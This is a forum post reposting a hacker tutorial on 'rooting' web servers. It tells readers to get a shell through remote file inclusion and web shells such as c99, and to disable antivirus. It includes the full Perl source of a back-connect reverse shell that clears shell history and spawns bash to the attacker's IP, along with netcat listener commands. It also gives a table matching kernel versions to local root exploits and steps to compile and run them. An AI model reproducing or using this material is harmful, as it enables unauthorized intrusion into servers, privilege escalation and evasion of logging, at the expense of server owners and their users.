Go4Expert - Rooting Tutorial

NOTE THIS TUT WAS NOT CREATED BY ME IT WAS MADE BY w3tw0rk AT ROOT SHELL SECURITY TEAM. PLEASE GIVE ALL THE THANKS TO HIM FOR MAKING THIS TUTORIAL

Hello Everyone and welcome to my tutorial on rooting boxes!! Today you will learn one of many methods to rooting an "insecure" box. Obviously if you are reading this I don't think you will be using any 0-day kernel exploits :P. So basic things you will need for this tutorial to work for you will be the following:

Shell Access on a website is the first thing you will need. How you gain this access is entirely up to you. I would say most people will end up going with a simple remote file inclusion and place yourself a c99, r57, locust or any shell of your choice.

You will want to get yourself a version of NetCat Which you can find at this location

http://www.vulnwatch.org/netcat/nc111nt.zip

If you have an antivirus that auto deletes infected files or virii i would suggest disabling it as some av's will detect netcat as a hacktool or remote admin tool. Once you have downloaded netcat open netcat up and it will ask you to enter a string for the command line. Reading up on netcat is recommended but if your lazy a string like this will do just fine

Code:

-vv -l -n -p <porttoconnecton>

From there you will want to aquire a nice back-connect. I preffer to use one thats not in the shell because i find that those back connects work shitty so i will provide you with one that i use. Very simple to use just save as "bc.pl" then upload to server and end execute.

Code:

perl bc.pl <youriphere> <porttoconnecton>

Code: PERL

#!/usr/bin/perl
use IO::Socket;
#   Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell          
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90                                          
# Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system    = '/bin/bash';
$ARGC=@ARGV;
print "IHS BACK-CONNECT BACKDOOR\n\n";
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "IHS BACK-CONNECT BACKDOOR  \n\n";
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF

**Note that if you are running a router or wireless on multiple ips set by your dhcp you might have to forward the <porttoconnecton> to what ever the ip of your computer is. You can check this by opening command prompt and typing ipconfig you should get an ip that looks similar to 192.168.1.100 which is the ip to forward to. If you are unsure about how to forward your port check out this site and find your router model.

http://portforward.com/routers.htm

So Now that you have your tools and you have your shell access open up netcat and type in -vv -l -n -p 8080 for this tutorial we will connect on port 8080. Hit enter and it should start listening.

Go back to the server and upload your bc.pl. Execute the back connect with a command such as perl bc.pl <yourip> 8080. once you execute this you can go back to the shell and it should have connected. With this particular back connect you don't have to find the kernel version because it displays it for you once it connects, but for those of you who are using a different back connect to find the os kernel version and userid you can type something like this into the shell and it will give you the info.

Code:

uname -a;id

Once executed you will see something probably similar to

Code:

Linux alexandra.adm24.de 2.6.8-2-686-smp #1 SMP Tue Aug 16 12:08:30 UTC 2005 i686 GNU/Linux

uid=33(www-data) gid=33(www-data) groups=33(www-data)

The important information here that you want is the OS & Kernel Ver. which in this case would be Linux and the kernel ver. is 2.6.8-2 and you can see the last update of it was in 2005 so it's fairly old. which is a good thing for us.

Here is a kernel refrence for you all this will tell you what exploits work for the differenet kernels. Just to give you a general idea. note that this refrence is kind of old but is still pretty accurate but there could be newer exploits now.

Code:

2.2 ->  ptrace

2.4.17 -> newlocal, kmod, uselib24

2.4.18 -> brk, brk2, newlocal, kmod

2.4.19 -> brk, brk2, newlocal, kmod

2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2

2.4.21 -> brk, brk2, ptrace, ptrace-kmod

2.4.22 -> brk, brk2, ptrace, ptrace-kmod

2.4.22-10 -> loginx

2.4.23 -> mremap_pte

2.4.24 -> mremap_pte, uselib24

2.4.25-1 -> uselib24

2.4.27 -> uselib24

2.6.2 -> mremap_pte, krad, h00lyshit

2.6.5 -> krad, krad2, h00lyshit

2.6.6 -> krad, krad2, h00lyshit

2.6.7 -> krad, krad2, h00lyshit

2.6.8 -> krad, krad2, h00lyshit

2.6.8-5 -> krad2, h00lyshit

2.6.9 -> krad, krad2, h00lyshit

2.6.9-34 -> r00t, h00lyshit

2.6.10 -> krad, krad2, h00lyshit

2.6.13 -> raptor, raptor2, h0llyshit, prctl

2.6.14 -> raptor, raptor2, h0llyshit, prctl

2.6.15 -> raptor, raptor2, h0llyshit, prctl

2.6.16 -> raptor, raptor2, h0llyshit, prctl

2.6.23 - 2.6.24 -> diane_lane_******_hard.c

2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c

Once you have found the Kernel ver. of the server you are about to root you need to find the Local Root Exploit for that kernel which you can find with google using the list above. Once you have found your Exploit you will want to compile it assuming it's in c which most are. To compile your xpl.c what you want to do is place the xpl.c on the server where you placed you bc.pl and then compile it. To Compile your c scripts go to your shell that you have spawned with netcat and type:
ex:

Code:

gcc xpl.c -o xpl

This will compile your xpl.c to a file named xpl.

From here now all you have to do is run your exploit which can be done by simply typing in your netcat connection

Code:

./xpl

It should execute the exploit file which you have just compiled and give you root depending on what the exploit requires. Some require nothing but running them. Others such as h0llyshit require a large file to exploit or to be made to exploit but this is just to explain how to root. you can read up on h0llyshit from here if you would like.

I know that there are many other methods to rooting boxes but this is one method that is people can use that is fairly easy to follow. If you have any comments about the method feel free to ask but please don't knock it down. If you do not like this method thats fine you can write a tutorial for everyone using your own method.

Hope you enjoyed this tutorial and i hope it was helpful to you.

Tutorial by w3tw0rk shoutz to rootshell security team
http://www.rootshell-team.com